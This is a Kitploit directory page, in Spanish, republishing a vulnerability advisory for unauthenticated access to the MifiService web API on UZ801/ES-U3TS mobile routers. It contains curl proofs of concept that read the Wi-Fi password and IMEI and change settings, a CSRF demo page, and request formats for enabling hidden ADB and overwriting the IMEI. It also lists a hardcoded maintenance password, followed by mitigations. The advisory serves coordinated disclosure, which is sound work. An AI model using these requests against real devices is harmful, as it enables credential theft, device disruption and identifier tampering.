Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-52200 — Advisory de seguridad que detalla un control de acceso roto en la API web MifiService de UZ801/ES-U3TS, que permite la extracción de datos no autenticada, la modificación de configuración y el reinicio del dispositivo. Incluye PoCs y mitigaciones. | Kitploit
Herramientas/GitHubGitHub/lamaper/cve-2026-52200
Seguridad IoTAnálisis de VulnerabilidadesExplotaciónAuditoría de ConfiguraciónRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHublamaper/cve-2026-52200

CVE-2026-52200

Advisory de seguridad que detalla un control de acceso roto en la API web MifiService de UZ801/ES-U3TS, que permite la extracción de datos no autenticada, la modificación de configuración y el reinicio del dispositivo. Incluye PoCs y mitigaciones.

Ver Repositorio
hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

UZ801 / ES-U3TS MifiService Control de Acceso Roto

Aviso de seguridad y notas técnicas sobre un problema de control de acceso roto en la API de gestión web embebida expuesta por MifiService.apk en la plataforma OEM / marca blanca UZ801_v2.1 de Wi-Fi móvil 4G LTE, también comercializada como ES-U3TS.

Este repositorio tiene como objetivo respaldar la divulgación coordinada y la asignación de CVE. Se centra en evidencia técnica reproducible y no armamentizada.

Resumen

El dispositivo afectado expone un endpoint de gestión HTTP basado en Jetty en:

root@kitploit:~
http://192.168.100.1/ajax

El despachador de solicitudes del backend está implementado en:

root@kitploit:~
com.mifiservice.server.AjaxSevlet

Aunque la interfaz web presenta una página de inicio de sesión, el backend no aplica una sesión autenticada válida del lado del servidor para la mayoría de las funciones de gestión. Como resultado, un atacante en la red adyacente puede invocar directamente operaciones sensibles de funcNo sin autenticación.

El impacto verificado incluye:

  • extracción de la contraseña Wi-Fi actual en texto claro
  • extracción de IMEI, información de firmware, estado de SIM y configuración de red
  • extracción de la configuración de DHCP y filtrado MAC
  • modificación y persistencia de la configuración de gestión sin autenticación
  • activación del restablecimiento de configuración y reinicio del dispositivo sin autenticación

Se confirmaron funciones adicionales de alto riesgo mediante análisis estático, incluyendo:

  • reinicio al bootloader
  • habilitación de modos USB ocultos ADB / Qualcomm Diag y reinicio
  • funcionalidad no documentada de sobrescritura de IMEI

Alcance y denominación

El hardware probado parece pertenecer a una familia de dispositivos OEM / marca blanca. El proveedor de desarrollo original exacto es actualmente desconocido, y no se ha identificado hasta ahora ningún contacto de seguridad confiable del proveedor.

Por lo tanto, este aviso utiliza la siguiente denominación de producto:

  • Plataforma: UZ801_v2.1
  • Alias de marketing observado: ES-U3TS
  • Firmware observado: UZ801-V3.4.3
  • Aplicación observada: MifiService.apk
  • Paquete observado: com.mifiservice.hello

Si se descubre que otras marcas o revendedores distribuyen el mismo firmware, APK, recursos web y comportamiento de funcNo, deben tratarse como variantes probablemente afectadas del mismo código base.

Componente afectado

  • Endpoint de API web /ajax
  • MifiService.apk
  • com.mifiservice.server.AjaxSevlet

Causa raíz

Este no es principalmente un problema de credenciales predeterminadas.

La causa raíz es el control de acceso roto en la API del backend:

  • no se aplica una sesión autenticada del lado del servidor para la mayoría de las solicitudes de gestión
  • no hay protección CSRF
  • no hay validación de Origin
  • no hay validación de Referer
  • no se requiere cookie de sesión ni token para la mayoría de las funciones sensibles

La función de inicio de sesión existe, pero no proporciona límites de autorización significativos para la mayor parte de la API de gestión.

Modelo de amenaza

Vector de ataque principal:

  • atacante de red adyacente conectado al punto de acceso del dispositivo

Vector de ataque secundario:

  • explotación CSRF basada en navegador / drive-by contra una víctima actualmente conectada a la LAN del dispositivo

Este no es un ataque remoto expuesto a Internet por defecto. El atacante debe:

  • tener alcance directo de Capa 2 / Capa 3 a 192.168.100.1, o
  • coaccionar al navegador de una víctima conectada para que envíe solicitudes al endpoint del dispositivo

Estado de la evidencia

Todos los hallazgos a continuación se incluyen como funcionalidad afectada del mismo problema de control de acceso roto.
Cuando corresponde, cada elemento está marcado explícitamente como:

  • Validado en vivo
  • Confirmado por análisis estático

Esta distinción se conserva para mayor precisión. La funcionalidad de alto riesgo no se etiqueta erróneamente como probada en vivo cuando no se ejecutó intencionalmente en hardware público.

Hallazgos técnicos por grupo de funciones

Divulgación de información sin autenticación

Modificación de configuración sin autenticación

Acciones disruptivas / administrativas sin autenticación

Funcionalidad no documentada o de tipo mantenimiento

funcNoDescripciónEstadoNotas

Estado del proveedor

  • Proveedor original upstream: desconocido
  • Tipo de producto: plataforma de router móvil OEM / marca blanca
  • Contacto PSIRT / seguridad confiable: no identificado
  • Estado actual de divulgación: proveedor inalcanzable / sin canal de seguridad de proveedor confirmado

Al momento de redactar este documento, el dispositivo parece venderse a través de canales OEM / revendedores con marca inconsistente o ausente, y no se ha establecido ningún contacto confiable con el proveedor de desarrollo original.

Ejemplos de PoC seguros

Los ejemplos a continuación están intencionalmente limitados a validación de solo lectura o de bajo impacto. Se incluyen para demostrar la vulnerabilidad sin proporcionar un flujo de explotación armamentizado.

1. Leer la contraseña Wi-Fi actual sin autenticación

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1002}' \
  http://192.168.100.1/ajax

Comportamiento esperado:

  • devuelve JSON
  • incluye ssid
  • incluye pwd en texto claro

2. Leer información de identificación del dispositivo sin autenticación

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1029}' \
  http://192.168.100.1/ajax

Comportamiento esperado:

  • devuelve JSON
  • incluye imei
  • incluye fwversion

3. Demostrar acceso de escritura persistente no autorizado usando un campo de bajo riesgo

Leer el idioma actual:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1030}' \
  http://192.168.100.1/ajax

Establecer idioma:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1031,"Language":"Chinese"}' \
  http://192.168.100.1/ajax

Restaurar el valor original después.

4. Concepto CSRF basado en navegador

Este endpoint no aplica estado de sesión ni validación de Origin / Referer. Por lo tanto, el navegador de una víctima conectada puede ser abusado para enviar solicitudes en segundo plano.

Página de demostración mínima:

root@kitploit:~
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: JSON.stringify({funcNo: 1002})
});
</script>

Este ejemplo está intencionalmente limitado a un número de función de solo lectura. No lo implemente contra usuarios o dispositivos de producción.

Formatos de solicitud no públicos / de alto riesgo

Los siguientes formatos JSON están documentados únicamente para análisis defensivo y clasificación. No se acompañan aquí de pasos de ejecución.

2001 - habilitar interfaces de depuración ocultas

root@kitploit:~
{"funcNo":2001}

Comportamiento observado en el código:

  • ejecuta setprop persist.sys.usb.config rndis,serial_smd,diag,adb
  • ejecuta sync
  • reinicia el dispositivo

2004 - ruta de sobrescritura de IMEI

root@kitploit:~
{"funcNo":2004,"imei":"<redacted-test-value>"}

Comportamiento observado en el código:

  • llama a una ruta equivalente a AT+WRIMEI=<value>
  • verifica el éxito mediante una ruta de lectura posterior de IMEI

No se incluye ninguna prueba pública en vivo aquí debido a preocupaciones legales, de cumplimiento e integridad del dispositivo.

Extractos de evidencia

Ejemplo de respuesta sin autenticación para 1002

root@kitploit:~
{
  "results": [
    {
      "dns1": "8.8.8.8",
      "ssid": "4G-UFI-8E1",
      "dns2": "8.8.8.8",
      "mask": "255.255.255.0",
      "pwd": "1234567890",
      "wlan_ip": "192.168.100.1",
      "IP": "192.168.100.1"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Ejemplo de respuesta sin autenticación para 1029

root@kitploit:~
{
  "results": [
    {
      "manufacture": "Qualcomm Technology",
      "dbm": "",
      "fwversion": "V3.4.3",
      "imei": "863993064154463"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Por qué este es un candidato a CVE

Este problema es un fuerte candidato a CVE porque:

  • es reproducible en un dispositivo controlado por el cliente
  • es alcanzable por un atacante de red adyacente
  • no depende de modificación física no documentada
  • no es meramente un problema de contraseña predeterminada
  • tiene impacto en confidencialidad, integridad y disponibilidad

Clasificación sugerida:

  • CWE-306 Autenticación faltante para función crítica
  • CWE-862 Autorización faltante

CVSS sugerido:

root@kitploit:~
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Estado de divulgación

  • Análisis estático completado: 2026-05-11
  • Validación en vivo completada: 2026-05-12
  • Preparación del contacto con el proveedor completada: 2026-05-12
  • Borrador del aviso público preparado: 2026-05-12

Mitigaciones

  • requerir una sesión autenticada válida del lado del servidor para todas las funciones de gestión
  • rechazar todas las solicitudes sensibles de funcNo sin autenticación
  • agregar protección CSRF
  • validar Origin y Referer
  • eliminar endpoints de mantenimiento no documentados de las compilaciones de producción
  • nunca exponer credenciales Wi-Fi a través de respuestas API sin autenticación

Aviso legal y de seguridad

Este repositorio está destinado a investigación defensiva, divulgación de vulnerabilidades y coordinación. Los ejemplos públicos están intencionalmente limitados a validación de bajo riesgo. La funcionalidad de alto riesgo se documenta solo en la medida necesaria para la remediación y la clasificación de CVE.

Descargar herramienta
funcNoDescripciónEstadoNotas
1002Leer SSID, IP del dispositivo, DNS, contraseña Wi-FiValidado en vivoDevuelve la contraseña Wi-Fi en texto claro
1009Leer modo de cifrado Wi-Fi y contraseñaValidado en vivoDevuelve la contraseña Wi-Fi en texto claro
1011Leer rango DHCP, DNS, lista de clientesValidado en vivoÚtil para reconocimiento local
1015Leer estado de SIMValidado en vivoDevuelve el estado de SIM
1029Leer IMEI, firmware, fabricante, información de señalValidado en vivoDevuelve identidad sensible del dispositivo
1052Leer modo de filtrado MAC y entradas configuradasValidado en vivoFiltra política y ranuras configuradas
2002Leer ranura SIM activaValidado en vivoExpone estado de ejecución
funcNoDescripciónEstadoNotas
1004Cambiar modo de conexiónConfirmado estáticamenteNo se observó aplicación de sesión
1005Cambiar modo de red preferidoConfirmado estáticamenteAlto impacto operativo
1007Cambiar SSID / número máximo de estacionesConfirmado estáticamentePersiste configuración y reinicia la lógica AP
1010Cambiar modo de cifrado / contraseña Wi-FiConfirmado estáticamenteAlto impacto de confidencialidad
1012Cambiar configuración relacionada con DHCP/DNSConfirmado estáticamenteManipulación de red local
1016/1017/1018Leer / establecer / cambiar perfil APNConfirmado estáticamenteModificación del comportamiento WAN
1031Cambiar idioma y persistirValidado en vivoUsado como prueba de bajo riesgo de acceso de escritura
1053/1054/1055Cambiar comportamiento y entradas de filtrado MACConfirmado estáticamenteManipulación del control de acceso a red
funcNoDescripciónEstadoNotas
1013Reiniciar dispositivoValidado en vivoDoS / interrupción del servicio
1014Restablecer configuración de aplicación/red y reiniciarValidado en vivoNo es un borrado completo de datos de usuario de Android
2000Reiniciar al bootloaderValidado en vivoAlto impacto operativo
2001Habilitar configuración USB oculta ADB/Diag y reiniciarConfirmado estáticamenteRuta de mantenimiento peligrosa
2003Ruta de contraseña de mantenimiento ocultaConfirmado estáticamenteUsa admin8888 codificado; el comportamiento parece parcial / residual
2004Sobrescribir IMEIConfirmado estáticamenteLlama a la ruta de comando AT; no ejecutado públicamente